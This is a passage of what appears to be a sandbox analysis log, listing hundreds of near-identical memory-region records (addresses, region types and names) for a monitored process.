end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20042 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20043 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20044 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20045 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20046 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20047 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20048 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20049 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20050 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20051 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20052 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20053 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20054 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20055 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20056 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20057 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20058 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20059 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20060 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20061 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20062 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20063 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20064 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20065 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20066 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20067 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20068 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20069 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 20070 start_va = 0x2100000 end_va = 0x2102fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 20071 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 20072 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20099 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20100 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20101 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20120 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20123 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20124 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20125 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20126 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20127 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20128 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20129 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20130 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20131 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20132 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20133 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20134 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20135 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20136 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20137 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20138 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20139 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20140 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20141 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20142 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20143 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20144 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20145 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20146 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20147 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20148 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20149 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20150 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20151 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20152 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20153 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20154 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20155 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20156 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20157 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20158 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20159 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20160 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20161 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20162 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20163 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20164 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20165 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20166 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20167 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20168 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20169 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20170 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20171 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20172 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20173 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20174 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20175 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20176 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20177 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20178 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20179 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20180 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20181 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 20182 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 20183 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20184 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20185 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20186 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20187 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20188 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20189 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20190 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20191 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20192 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20193 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20194 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20195 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20196 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20197 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20198 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20199 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20200 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20201 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20202 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20203 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20204 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20205 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20206 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20207 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20208 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20209 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20210 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20211 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20212 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20213 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20214 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20215 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20216 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20217 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20218 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20219 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20220 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20221 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20222 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20223 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20224 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20225 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20226 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20227 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20228 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 20229 start_va = 